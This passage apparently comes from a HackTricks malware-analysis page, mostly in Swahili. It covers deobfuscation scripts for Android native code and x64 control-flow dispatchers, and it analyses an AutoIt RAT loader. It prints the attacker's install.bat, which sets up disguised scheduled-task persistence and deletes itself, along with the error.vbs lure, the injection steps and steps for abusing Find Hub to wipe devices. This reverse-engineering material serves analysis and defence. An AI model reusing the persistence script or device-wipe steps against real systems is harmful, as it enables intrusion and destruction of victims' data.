project = angr.Project( ‘/path/to/libtarget.so’, load_options={‘main_opts’: {‘base_addr’: 0x00100000}}, auto_load_libs=False, )

ENCODING_FUNC_ADDR = 0x00100e10 # decoder function discovered in Ghidra

def decode_string(enc_addr, length):

fresh blank state per evaluation

st = project.factory.blank_state() outbuf = st.heap.allocate(length) call = project.factory.callable(ENCODING_FUNC_ADDR, base_state=st) ret_ptr = call(enc_addr, outbuf, length) # returns outbuf pointer rs = call.result_state raw = rs.solver.eval(rs.memory.load(ret_ptr, length), cast_to=bytes) return raw.split(b’\x00’, 1)[0].decode(‘utf-8’, errors=‘ignore’)

Example: decode a JNI signature at 0x100933 of length 5 → should be ()[B

print(decode_string(0x00100933, 5))

</details>

- Kwa kiwango kikubwa, unda ramani ya static ya call sites kwa arguments za decoder (encoded_ptr, size). Wrappers zinaweza kuficha arguments, hivyo unaweza kuunda mapping hii kwa mikono kutoka Ghidra xrefs ikiwa API recovery ina kelele.

<details>
<summary>Fanya batch decode ya call sites nyingi kwa kutumia angr</summary>
```python
# call_site -> (encoded_addr, size)
call_site_args_map = {
0x00100f8c: (0x00100b81, 0x41),
0x00100fa8: (0x00100bca, 0x04),
0x00100fcc: (0x001007a0, 0x41),
0x00100fe8: (0x00100933, 0x05),
0x0010100c: (0x00100c62, 0x41),
0x00101028: (0x00100c15, 0x16),
0x00101050: (0x00100a49, 0x101),
0x00100cf4: (0x00100821, 0x11),
0x00101170: (0x00100940, 0x101),
0x001011cc: (0x0010084e, 0x13),
0x00101334: (0x001007e9, 0x0f),
0x00101478: (0x0010087d, 0x15),
0x001014f8: (0x00100800, 0x19),
0x001015e8: (0x001008e6, 0x27),
0x0010160c: (0x00100c33, 0x13),
}

decoded_map = { hex(cs): decode_string(enc, sz)
for cs, (enc, sz) in call_site_args_map.items() }

import json
print(json.dumps(decoded_map, indent=2))
with open('decoded_strings.json', 'w') as f:
json.dump(decoded_map, f, indent=2)

Ask for the JSON produced by the angr script

f = askFile(‘Select decoded_strings.json’, ‘Load’) mapping = json.load(open(f.absolutePath, ‘r’)) # keys as hex strings

fm = currentProgram.getFunctionManager() rm = currentProgram.getReferenceManager()

Replace with your decoder address to locate call-xrefs (optional)

ENCODING_FUNC_ADDR = 0x00100e10 enc_addr = toAddr(ENCODING_FUNC_ADDR)

callsite_to_fn = {} for ref in rm.getReferencesTo(enc_addr): if ref.getReferenceType().isCall(): from_addr = ref.getFromAddress() fn = fm.getFunctionContaining(from_addr) if fn: callsite_to_fn[from_addr.getOffset()] = fn.getName()

Write comments from JSON

for k_hex, s in mapping.items(): cs = int(k_hex, 16) site = toAddr(cs) caller = callsite_to_fn.get(cs, None) text = s if caller is None else ‘%s @ %s’ % (s, caller) currentProgram.getListing().setComment(site, CodeUnit.PRE_COMMENT, text) print(‘[+] Annotated %d call sites’ % len(mapping))

</details>

Chaguo B: Script moja ya CPython kupitia pyhidra/ghidra_bridge
- Kwa njia mbadala, tumia pyhidra au ghidra_bridge kuendesha API ya Ghidra kutoka kwenye mchakato uleule wa CPython unaotumia angr. Hii inaruhusu kuita decode_string() na mara moja kuweka PRE_COMMENTs bila faili ya kati. Mantiki inafanana na script ya Jython: jenga callsite→function map kwa kutumia ReferenceManager, decode kwa angr, na weka maoni.

Kwanini hii inafanya kazi na lini kutumia
- Utekelezaji offline huiepuka RASP/anti-debug: hakuna ptrace, hakuna Frida hooks zinazohitajika kurejesha strings.
- Kuhakikisha Ghidra na angr base_addr zimepangwa kwa usahihi (mfano, 0x00100000) kunahakikisha kuwa anwani za function/data zinaendana katika zana zote.
- Mapishi yanayoweza kurudiwa kwa decoders: tenda transform kama pure function, tengeneza output buffer katika state safi, itoe kwa (encoded_ptr, out_ptr, len), kisha concretize kupitia state.solver.eval na changanua C-strings hadi \x00.

Tahadhari na vikwazo
- Heshimu target ABI/calling convention. angr.factory.callable huchagua moja kulingana na arch; ikiwa arguments zinaonekana kushushwa, bainisha cc waziwazi.
- Ikiwa decoder inatarajia output buffers zilizosafishwa kwa zeros, anzisha outbuf kwa zeros katika state kabla ya call.
- Kwa Android .so zisizo za positioning-dependent, daima toa base_addr ili anwani katika angr ziendane na zilizoonekana katika Ghidra.
- Tumia currentProgram.getReferenceManager() kuorodhesha call-xrefs hata kama app imejifunika decoder nyuma ya thin stubs.

For angr basics, see: [angr basics](../../reversing/reversing-tools-basic-methods/angr/README.md)

---

## Kuondoa ufichaji wa Dynamic Control-Flow (JMP/CALL RAX Dispatchers)

Familia za kisasa za malware zinatumia vibaya ufichaji wa Control-Flow Graph (CFG): badala ya kuruka/call ya moja kwa moja wanahesabu destination wakati wa runtime na kisha kutekeleza `jmp rax` au `call rax`. Dispatcher mdogo (*dispatcher*) (kwa kawaida maagizo tisa) huweka target ya mwisho kulingana na flags za CPU `ZF`/`CF`, na kuvunja kabisa urejeshaji wa static CFG.

Mbinu — iliyoonyeshwa na loader ya SLOW#TEMPEST — inaweza kushindwa kwa mtiririko wa kazi wa hatua tatu unaotegemea tu IDAPython na Unicorn CPU emulator.

### 1. Tambua kila indirect jump / call
```python
import idautils, idc

for ea in idautils.FunctionItems(idc.here()):
mnem = idc.print_insn_mnem(ea)
if mnem in ("jmp", "call") and idc.print_operand(ea, 0) == "rax":
print(f"[+] Dispatcher found @ {ea:X}")

2. Toa byte-code ya dispatcher

import idc

def get_dispatcher_start(jmp_ea, count=9):
s = jmp_ea
for _ in range(count):
s = idc.prev_head(s, 0)
return s

start = get_dispatcher_start(jmp_ea)
size  = jmp_ea + idc.get_item_size(jmp_ea) - start
code  = idc.get_bytes(start, size)
open(f"{start:X}.bin", "wb").write(code)

3. Iga mara mbili kwa kutumia Unicorn

from unicorn import *
from unicorn.x86_const import *
import struct

def run(code, zf=0, cf=0):
BASE = 0x1000
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(BASE, 0x1000)
mu.mem_write(BASE, code)
mu.reg_write(UC_X86_REG_RFLAGS, (zf << 6) | cf)
mu.reg_write(UC_X86_REG_RAX, 0)
mu.emu_start(BASE, BASE+len(code))
return mu.reg_read(UC_X86_REG_RAX)

Endesha run(code,0,0) na run(code,1,1) ili kupata false na true branch targets.

4. Rudisha patch ya direct jump / call

import struct, ida_bytes

def patch_direct(ea, target, is_call=False):
op   = 0xE8 if is_call else 0xE9           # CALL rel32 or JMP rel32
disp = target - (ea + 5) & 0xFFFFFFFF
ida_bytes.patch_bytes(ea, bytes([op]) + struct.pack('<I', disp))

Baada ya patching, lazimisha IDA ichambue tena function ili CFG kamili na Hex-Rays output zirudishwe:

import ida_auto, idaapi
idaapi.reanalyze_function(idc.get_func_attr(ea, idc.FUNCATTR_START))

5. Label indirect API calls

Mara tu lengo halisi la kila call rax litakapojulikana, unaweza kumuambia IDA ni nini ili aina za parameter & majina ya variable zirudishwe kiotomatiki:

idc.set_callee_name(call_ea, resolved_addr, 0)  # IDA 8.3+

Manufaa ya Kivitendo

• Inarudisha CFG halisi → decompilation inatoka mistari 10 ikawa maelfu.
• Inaruhusu string-cross-reference & xrefs, na kufanya ujenzi upya wa tabia kuwa rahisi.
• Skripti zinaweza kutumika tena: ziweke kwenye loader yoyote iliyo lindwa kwa mbinu ile ile.

AutoIt-based loaders: .a3x decryption, Task Scheduler masquerade and RAT injection

Mfumo huu wa uvamizi unaunganisha MSI iliyosainiwa, AutoIt loaders compiled to .a3x, na Task Scheduler job inajifanya kama benign app.

MSI → custom actions → AutoIt orchestrator

Mti wa mchakato na amri zinazotekelezwa na MSI custom actions:

• MsiExec.exe → cmd.exe kuendesha install.bat
• WScript.exe kuonyesha dialogu ya kosa la kutongoza

%SystemRoot%\system32\cmd.exe /c %APPDATA%\스트레스 클리어\install.bat
%SystemRoot%\System32\WScript.exe %APPDATA%\스트레스 클리어\error.vbs

install.bat (inaweka loader, inaweka persistence, inajisafisha):

@echo off
set dr=Music

copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe
copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3

cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe ^
& hwpviewer /delete /tn "IoKlTr" /f ^
& hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3"

del /f /q "%~dp0AutoIt3.exe"
del /f /q "%~dp0IoKlTr.au3"
del /f /q "%~f0"

error.vbs (mtego wa mtumiaji):

MsgBox "현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다." & vbCrLf & _
"설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.", _
vbCritical, "언어팩 오류"

Vifaa muhimu na utawala wa kujifanya:

• Inaweka AutoIt3.exe na IoKlTr.au3 katika C:\Users\Public\Music
• Inakopia schtasks.exe kuwa hwpviewer.exe (inaiga Hangul Word Processor viewer)
• Inaunda scheduled task “IoKlTr” ambayo inaendeshwa kila dakika 1
• Startup LNK inayojitokeza kama Smart_Web.lnk; mutex: Global\AB732E15-D8DD-87A1-7464-CE6698819E701
• Inaweka modules chini ya %APPDATA%\Google\Browser\ subfolders zenye adb au adv na inaanzisha kwa msaada wa autoit.vbs/install.bat helpers

Vidokezo vya forensic triage:

• schtasks enumeration: schtasks /query /fo LIST /v | findstr /i "IoKlTr hwpviewer"
• Tafuta nakala zilizobadilishwa jina za schtasks.exe zilizoambatana na Task XML: dir /a "C:\Users\Public\Music\hwpviewer.exe"
• Njia za kawaida: C:\Users\Public\Music\AutoIt3.exe, ...\IoKlTr.au3, Startup Smart_Web.lnk, %APPDATA%\Google\Browser\(adb|adv)*
• Linganisha uundaji wa mchakato: AutoIt3.exe ikizalisha Windows binaries halali (kwa mfano, cleanmgr.exe, hncfinder.exe)

AutoIt loaders and .a3x payload decryption → injection

• Moduli za AutoIt zimekomilishwa na #AutoIt3Wrapper_Outfile_type=a3x na zina-decrypt payload zilizojazwa kabla ya kuziingiza katika michakato isiyo hatari.
• Familia zilizobainika: QuasarRAT (ilioingizwa ndani ya hncfinder.exe) na RftRAT/RFTServer (ilioingizwa ndani ya cleanmgr.exe), pamoja na moduli za RemcosRAT (Remcos\RunBinary.a3x).
• Muundo wa decryption: pata funguo la AES kupitia HMAC, decrypt blob iliyojazwa, kisha ingiza moduli ya plain text.

Generic decryption skeleton (exact HMAC input/algorithm is family-specific):

import hmac, hashlib
from Crypto.Cipher import AES

def derive_aes_key(secret: bytes, data: bytes) -> bytes:
# Example: HMAC-SHA256 → first 16/32 bytes as AES key
return hmac.new(secret, data, hashlib.sha256).digest()

def aes_decrypt_cbc(key: bytes, iv: bytes, ct: bytes) -> bytes:
return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(ct)

Mtiririko wa kawaida wa injection (CreateRemoteThread-style):

• CreateProcess (suspended) ya host lengwa (mfano, cleanmgr.exe)
• VirtualAllocEx + WriteProcessMemory na module/shellcode iliyofichuliwa
• CreateRemoteThread or QueueUserAPC ili kutekeleza payload

Mawazo ya uwindaji

• AutoIt3.exe ikiwa na mzazi MsiExec.exe au WScript.exe ikizalisha utiliti za mfumo
• Faili zenye nyongeza .a3x au AutoIt script runners katika njia za umma/zinazoweza kuandikwa na watumiaji
• Kazi za kupanga (scheduled tasks) zinazoshukiwa zinazosababisha AutoIt3.exe au binaries zisizosainiwa na Microsoft, zikiwa na vichocheo vya kiwango cha dakika

Matumizi mabaya ya kuchukua akaunti ya Android Find My Device (Find Hub)

Wakati wa uvamizi wa Windows, waendeshaji walitumia nyaraka za Google zilizoporwa kufuta mara kwa mara vifaa vya Android vya mwathirika, wakizuia arifa wakati walipoongeza upatikanaji kupitia messenger ya desktop iliyokuwa imeingia kwa mwathirika.

Hatua za operator (kutoka kwenye kikao cha browser kilichoingia):

• Angalia Google Account → Security → Your devices; fuata Find My Phone → Find Hub (https://www.google.com/android/find)
• Chagua kifaa → ingiza tena nenosiri la Google → toa “Erase device” (factory reset); rudia ili kuchelewesha urejeshaji
• Hiari: futa barua za tahadhari kwenye sanduku la barua lililounganishwa (mfano, Naver) ili kuficha arifa za usalama

AdaptixC2: Uchimbaji wa Mipangilio na TTPs

Tazama ukurasa maalum:

Adaptixc2 Config Extraction And Ttps

References

• Unit42 – Evolving Tactics of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques
• SoTap: Lightweight in-app JNI (.so) behavior logger – github.com/RezaArbabBot/SoTap
• Strategies for Analyzing Native Code in Android Applications: Combining Ghidra and Symbolic Execution for Code Decryption and Deobfuscation – revflash.medium.com
• Ghidra – github.com/NationalSecurityAgency/ghidra
• angr – angr.io
• JNI_OnLoad and invocation API – docs.oracle.com
• RegisterNatives – docs.oracle.com
• Tracing JNI Functions – valsamaras.medium.com
• Native Enrich: Scripting Ghidra and Frida to discover hidden JNI functions – laripping.com
• Unit42 – AdaptixC2: A New Open-Source Framework Leveraged in Real-World Attacks
• KONNI-linked APT abuses Google Find Hub to wipe Android devices after Windows intrusion – genians.co.kr
• Android Find My Device (Find Hub) – google.com/android/find
• RftRAT/RFTServer technical analysis – asec.ahnlab.com
• HMAC background – wikipedia.org/wiki/HMAC

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.